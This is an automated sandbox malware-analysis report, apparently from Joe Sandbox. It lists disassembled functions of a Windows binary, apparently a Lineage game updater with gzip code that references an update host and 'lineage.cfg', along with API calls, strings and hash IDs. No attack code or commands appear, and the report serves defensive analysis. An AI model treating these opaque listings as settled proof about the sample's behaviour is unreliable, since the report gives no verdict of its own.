                                                                              • Opcode ID: 36b048917b2985cbf2fac1135b6efcdcbd1921479a9c6b949d41a688d8a32ec4
                                                                              • Instruction ID: 5683366541345941d0fbb9906bcc136d9a94eb4e2445dfba0e80b07bcff9359f
                                                                              • Opcode Fuzzy Hash: 36b048917b2985cbf2fac1135b6efcdcbd1921479a9c6b949d41a688d8a32ec4
                                                                              • Instruction Fuzzy Hash: 25510FB17001400BD7248E38AC91BAB37E5ABD2765358927AEE82D73E0E67EC905934C
                                                                              Function 00404F70 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 156stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: strrchr$fprintfstrcspn
                                                                              • String ID: .tar$.tgz$can't recover suffix$internal error in shorten_name$name too short
                                                                              • API String ID: 3861143205-2223311432
                                                                              • Opcode ID: 56e2620eb037e95c92781b0fa5cc298dba40189d7c33656321d29130f0b3e5c7
                                                                              • Instruction ID: cfa93fa0c9688f37e3b74e6e18ad113cd6a683f9ce775eb1b0710fe7abdf1a04
                                                                              • Opcode Fuzzy Hash: 56e2620eb037e95c92781b0fa5cc298dba40189d7c33656321d29130f0b3e5c7
                                                                              • Instruction Fuzzy Hash: 854138766087551BD7209E286C107AFBBC1DB96310F28467BEC85A33C2D7BA9C0987DD
                                                                              Function 0040A7E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • usmainupd2.lineageTheBloodPledge.com, xrefs: 0040A7E5
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _open_write$_chmod_closefreestrncmp
                                                                              • String ID: usmainupd2.lineageTheBloodPledge.com
                                                                              • API String ID: 1992929274-4278508022
                                                                              • Opcode ID: b0b10054e9d811ef64e9d479db2ebb033e4e170392b009d181fcf804bc130eab
                                                                              • Instruction ID: d5b790ee09dae37e68e7750a3a3385f08c03447546272726d46f10df84067ba6
                                                                              • Opcode Fuzzy Hash: b0b10054e9d811ef64e9d479db2ebb033e4e170392b009d181fcf804bc130eab
                                                                              • Instruction Fuzzy Hash: 6001F9325402107BD1016715AC45EAF33A8DF85B55F04C039F904A2280EB7D9D5787FF
                                                                              Function 00408F00 Relevance: 13.6, APIs: 9, Instructions: 97fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00408F1B
                                                                              • GetFileSize.KERNEL32(00000000,?), ref: 00408F32
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408F43
                                                                              • malloc.MSVCRT ref: 00408F51
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408F61
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CloseFileHandle$CreateSizemalloc
                                                                              • String ID:
                                                                              • API String ID: 832796747-0
                                                                              • Opcode ID: 479da16b189d4319f38e416f2df4ef96fa9eec955b64e273ff50ff58c6565655
                                                                              • Instruction ID: d4d4dbeef034970ea3fce49b00f5570b28fcdb05ba413549aa964d5a795237e1
                                                                              • Opcode Fuzzy Hash: 479da16b189d4319f38e416f2df4ef96fa9eec955b64e273ff50ff58c6565655
                                                                              • Instruction Fuzzy Hash: BE21CC76204305AFE7105B74BC48FEB7769EB84722F10853EF74AD1280EBB498858769
                                                                              Function 00406930 Relevance: 13.6, APIs: 9, Instructions: 81windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • vsprintf.MSVCRT ref: 00406948
                                                                              • SendDlgItemMessageA.USER32(?,000003F5,000000B1,00000000,000000FF), ref: 00406974
                                                                              • SendDlgItemMessageA.USER32(?,000003F5,000000B0,?,?), ref: 00406990
                                                                              • SendDlgItemMessageA.USER32(?,000003F5,000000B1,00000000,00003FFF), ref: 004069B5
                                                                              • SendDlgItemMessageA.USER32(?,000003F5,000000C2,00000000,004231C8), ref: 004069CF
                                                                              • SendDlgItemMessageA.USER32(?,000003F5,000000B1,00000000,000000FF), ref: 004069E5
                                                                              • SendDlgItemMessageA.USER32(?,000003F5,000000B0,?,?), ref: 00406A01
                                                                              • SendDlgItemMessageA.USER32(?,000003F5,000000B1,?,?), ref: 00406A1A
                                                                              • SendDlgItemMessageA.USER32(?,000003F5,000000C2,00000000,?), ref: 00406A33
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMessageSend$vsprintf
                                                                              • String ID:
                                                                              • API String ID: 1140547905-0
                                                                              • Opcode ID: 71bffc2fb07b61fe9fb47ff9566554edaf6b3f8d3e673b034361d1632632bf64
                                                                              • Instruction ID: 5521610152aa145ef41dce1af4b3ce32329c33d7c881f2a6bf9fd3f2bfd00b01
                                                                              • Opcode Fuzzy Hash: 71bffc2fb07b61fe9fb47ff9566554edaf6b3f8d3e673b034361d1632632bf64
                                                                              • Instruction Fuzzy Hash: EA214F71B843167BF520D754DC86FA637ACDB84B00F80892AB754AB1E0EBF4B9418F95
                                                                              Function 00406E90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: htonl$MessageSend_ftolsprintf
                                                                              • String ID: %s.gz
                                                                              • API String ID: 347006897-506877619
                                                                              • Opcode ID: 919993e58ef4d44a7d01eedb12fe464d1e9105f1e53959857d31b62cf5412cd8
                                                                              • Instruction ID: f5cd75c4530d01ae92219204bb5bf1eb5bff02ec4c610d68433682fc3c536229
                                                                              • Opcode Fuzzy Hash: 919993e58ef4d44a7d01eedb12fe464d1e9105f1e53959857d31b62cf5412cd8
                                                                              • Instruction Fuzzy Hash: DB4112B4F44310ABD250EFA9FC46F5A33A0E740705F45817AF545A72E2C6BCB9518BAC
                                                                              Function 0040A1D0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: atoi$_strcmpi
                                                                              • String ID: netsgo$usmainupd2.lineageTheBloodPledge.com
                                                                              • API String ID: 4201911817-1120272338
                                                                              • Opcode ID: 804d48ebb8e193a3701d3e4b44d9c4b8fda528b3347b24a38b2dd944ec3e9824
                                                                              • Instruction ID: 946a26e6737a1b535d9a7643eafd1095cdeaa3c405f852664bfcc13734166e7d
                                                                              • Opcode Fuzzy Hash: 804d48ebb8e193a3701d3e4b44d9c4b8fda528b3347b24a38b2dd944ec3e9824
                                                                              • Instruction Fuzzy Hash: CD11967A70020067E710975CFC85BEA7358E788720F44813AED58D2380E1BEE99A96B6
                                                                              Function 0040A880 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • usmainupd2.lineageTheBloodPledge.com, xrefs: 0040A8C2
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _lseek_open
                                                                              • String ID: usmainupd2.lineageTheBloodPledge.com
                                                                              • API String ID: 2666902854-4278508022
                                                                              • Opcode ID: b9d5d0ad0b8e288daf73789ce982e88d89c1d5d658d0e14e783b8d1a5a6732ca
                                                                              • Instruction ID: d121094fae00023878105c1caa6307fda9599a7c7ea01373903d1cc1979eb394
                                                                              • Opcode Fuzzy Hash: b9d5d0ad0b8e288daf73789ce982e88d89c1d5d658d0e14e783b8d1a5a6732ca
                                                                              • Instruction Fuzzy Hash: D5F0287374122077D7206BA8AC89FDB7798EF85372F108136F644D62C0DB7A995087AD
                                                                              Function 00408D80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • usmainupd2.lineageTheBloodPledge.com, xrefs: 00408DE8
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: fgets$atoifclosefopen
                                                                              • String ID: usmainupd2.lineageTheBloodPledge.com
                                                                              • API String ID: 3390724653-4278508022
                                                                              • Opcode ID: 36bf16d3365ebe6c1982db41ce7a78d6910c9eedce31e0dc370ecbff149c33f3
                                                                              • Instruction ID: ec9c16981d60bf94d8cf6ba1c7eade0994ddd278513ceb63639861188bf572e6
                                                                              • Opcode Fuzzy Hash: 36bf16d3365ebe6c1982db41ce7a78d6910c9eedce31e0dc370ecbff149c33f3
                                                                              • Instruction Fuzzy Hash: A141E4352043049BD314CB78AD456AB7BD0BB81354F544A3DF9A6E31D1EFB9D908C68D
                                                                              Function 004033B0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 32COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: fprintf
                                                                              • String ID: %s$%s %s (%s)$1.2.4$18 Aug 93
                                                                              • API String ID: 383729395-2112967068
                                                                              • Opcode ID: 542d0755c800e3b9d5a421d42a4a9b403712bb1b221898fa84610f293fabf537
                                                                              • Instruction ID: 09dec0b7b20d19481886b311921ae21eb8528ad09ed27254591a6e29a08808c4
                                                                              • Opcode Fuzzy Hash: 542d0755c800e3b9d5a421d42a4a9b403712bb1b221898fa84610f293fabf537
                                                                              • Instruction Fuzzy Hash: 12F0A77174020277D2109B99EC81FC72B9C4B847543168136FE05F73A1D6FDE9C186AC
                                                                              Function 00403410 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: fprintf
                                                                              • String ID: %s$%s %s (%s)$1.2.4$18 Aug 93
                                                                              • API String ID: 383729395-2112967068
                                                                              • Opcode ID: acfd205bf67f35b03ded3974709c3b43450fb2e25cc5f08b1349498bc72d68d5
                                                                              • Instruction ID: d922d7cee56dcaa0d6c03bcf1d33a6800460bf96123738d13dfdc2df850cb791
                                                                              • Opcode Fuzzy Hash: acfd205bf67f35b03ded3974709c3b43450fb2e25cc5f08b1349498bc72d68d5
                                                                              • Instruction Fuzzy Hash: F6F0A07134020177E2109B89EC40FC3679D9B84B643168036FA05F73A1D2FCE8D1866D
                                                                              Function 0040F0A0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • fprintf.MSVCRT ref: 0040F0BC
                                                                              • _errno.MSVCRT ref: 0040F0C1
                                                                              • perror.MSVCRT ref: 0040F0D2
                                                                                • Part of subcall function 00405600: _close.MSVCRT ref: 0040560F
                                                                                • Part of subcall function 00405600: _unlink.MSVCRT(0044F8A0), ref: 0040561A
                                                                              • fprintf.MSVCRT ref: 0040F0F1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: fprintf$_close_errno_unlinkperror
                                                                              • String ID: %s: $%s: unexpected end of file
                                                                              • API String ID: 1149763740-1106867712
                                                                              • Opcode ID: 59e5e5cce7ed04751cdfe136a20e8464cae7361fafefde8ae2815f64ee9efe7e
                                                                              • Instruction ID: 4ca2c0cbfd535fbb8a2d196ce49de31ad3a0226fe2c68e532ce39777a4f2675f
                                                                              • Opcode Fuzzy Hash: 59e5e5cce7ed04751cdfe136a20e8464cae7361fafefde8ae2815f64ee9efe7e
                                                                              • Instruction Fuzzy Hash: E9E02B719403007BC600ABE4FC85ADB33149F45314354C43AF805623D0D5BE98C14BAD
                                                                              Function 00408C70 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EndDialog.USER32(00000000,00000000), ref: 00408C9A
                                                                              • EndDialog.USER32(00000000,00000001), ref: 00408CB0
                                                                              • SendDlgItemMessageA.USER32(?,000003F5,000000C5,00007FFF,00000000), ref: 00408CE1
                                                                              • EndDialog.USER32(00000000,00000000), ref: 00408D47
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Dialog$ItemMessageSend
                                                                              • String ID:
                                                                              • API String ID: 3275996760-0
                                                                              • Opcode ID: 8b14c4b2e2c3fa31662da62b01d202dbc81381d959c28cf83e5a59590a4a2407
                                                                              • Instruction ID: 66409707314fec767c8dfc2c1b69d48ff37f6e451188117965d607da9f69be5f
                                                                              • Opcode Fuzzy Hash: 8b14c4b2e2c3fa31662da62b01d202dbc81381d959c28cf83e5a59590a4a2407
                                                                              • Instruction Fuzzy Hash: 2A21363234460967E6308F60AD84FA77765D794711F20C53BF281EB2D2CBBAE882931C
                                                                              Function 00406AA0 Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _errnostrchr$_mkdirstrncpy
                                                                              • String ID:
                                                                              • API String ID: 1944004910-0
                                                                              • Opcode ID: b9459f4fb9f4554ea5f374cea7f1d7cf46ae2a94543f8e0fd08da2e9391c3a3d
                                                                              • Instruction ID: c7fd45ab8ac5d769a2df9dbbbf872869e0c49be0cc6fbd454d5c5320d20fbb43
                                                                              • Opcode Fuzzy Hash: b9459f4fb9f4554ea5f374cea7f1d7cf46ae2a94543f8e0fd08da2e9391c3a3d
                                                                              • Instruction Fuzzy Hash: FD113832500308AFD320A758EC04FE777ACEBC5311F05453AED4993280E67EA919CAB5
                                                                              Function 0040E670 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • %s: %s: not a valid zip file, xrefs: 0040E76A
                                                                              • %s: %s: first entry not deflated or stored -- use unzip, xrefs: 0040E700
                                                                              • %s: %s: encrypted file -- use unzip, xrefs: 0040E72D
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: fprintf
                                                                              • String ID: %s: %s: encrypted file -- use unzip$%s: %s: first entry not deflated or stored -- use unzip$%s: %s: not a valid zip file
                                                                              • API String ID: 383729395-1335502982
                                                                              • Opcode ID: 3ae31f77682639302eeaa8b56bb6aeff166fc1940e5eb74c95f73508baa077cf
                                                                              • Instruction ID: ccba45bf3cdfee631a7557de64997877714a34fce8de09d69fdfbe282000d52f
                                                                              • Opcode Fuzzy Hash: 3ae31f77682639302eeaa8b56bb6aeff166fc1940e5eb74c95f73508baa077cf
                                                                              • Instruction Fuzzy Hash: 34310971B042905BD708DF28FCA5AA67BE1DB85701328C4BFE4469B762C2749955C78C
                                                                              Function 0040F130 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: fputc$fprintf
                                                                              • String ID: %2ld.%1ld%%$gfff
                                                                              • API String ID: 1721641446-1642739240
                                                                              • Opcode ID: 5f1f8430f7442e578903eb5f695dc9495466b27275a5b858d1406b8d9976c704
                                                                              • Instruction ID: 5972cb3f326e6bc6d8ea684cb43cfc3fbca8fe663e5fa5fa333193b1056b7619
                                                                              • Opcode Fuzzy Hash: 5f1f8430f7442e578903eb5f695dc9495466b27275a5b858d1406b8d9976c704
                                                                              • Instruction Fuzzy Hash: 1801C4317041159BC718CA0DFC15E7A37A5DBC9704F14413EF445EF281D674EC1A87AA
                                                                              Function 0040A690 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 89COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004071D0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,usmainupd2.lineageTheBloodPledge.com,?,75C09CE0,?,0040A69E,lineage.cfg,00000000,usmainupd2.lineageTheBloodPledge.com), ref: 004071EB
                                                                                • Part of subcall function 004071D0: sprintf.MSVCRT ref: 00407203
                                                                              • inet_ntoa.WS2_32(00000000), ref: 0040A71E
                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?), ref: 0040A759
                                                                              Strings
                                                                              • usmainupd2.lineageTheBloodPledge.com, xrefs: 0040A691
                                                                              • lineage.cfg, xrefs: 0040A694
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ??3@CreateFileinet_ntoasprintf
                                                                              • String ID: lineage.cfg$usmainupd2.lineageTheBloodPledge.com
                                                                              • API String ID: 1315205024-3440496695
                                                                              • Opcode ID: c31013b62972e259811996fe396ded22d9c1ba85ff980e8f05514d338c30324e
                                                                              • Instruction ID: 25192f007a0f3ae62e241f977d47106c3ee39ebb564a0d4c6efc90b884b36583
                                                                              • Opcode Fuzzy Hash: c31013b62972e259811996fe396ded22d9c1ba85ff980e8f05514d338c30324e
                                                                              • Instruction Fuzzy Hash: 28214C356447081BC71049389C8456B37E69EA7334B2D8737FCA6A73C0E67EDC19924A
                                                                              Function 00408200 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WSAGetLastError.WS2_32 ref: 0040824A
                                                                                • Part of subcall function 00406930: vsprintf.MSVCRT ref: 00406948
                                                                                • Part of subcall function 00406930: SendDlgItemMessageA.USER32(?,000003F5,000000B1,00000000,000000FF), ref: 00406974
                                                                                • Part of subcall function 00406930: SendDlgItemMessageA.USER32(?,000003F5,000000B0,?,?), ref: 00406990
                                                                                • Part of subcall function 00406930: SendDlgItemMessageA.USER32(?,000003F5,000000B1,00000000,00003FFF), ref: 004069B5
                                                                                • Part of subcall function 00406930: SendDlgItemMessageA.USER32(?,000003F5,000000C2,00000000,004231C8), ref: 004069CF
                                                                                • Part of subcall function 00406930: SendDlgItemMessageA.USER32(?,000003F5,000000B1,00000000,000000FF), ref: 004069E5
                                                                                • Part of subcall function 00406930: SendDlgItemMessageA.USER32(?,000003F5,000000B0,?,?), ref: 00406A01
                                                                                • Part of subcall function 00406930: SendDlgItemMessageA.USER32(?,000003F5,000000B1,?,?), ref: 00406A1A
                                                                                • Part of subcall function 00406930: SendDlgItemMessageA.USER32(?,000003F5,000000C2,00000000,?), ref: 00406A33
                                                                              • WSAGetLastError.WS2_32 ref: 00408277
                                                                              Strings
                                                                              • Failed to set recv timeout: %d, xrefs: 0040824D
                                                                              • Failed to set send timeout: %d, xrefs: 0040827A
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
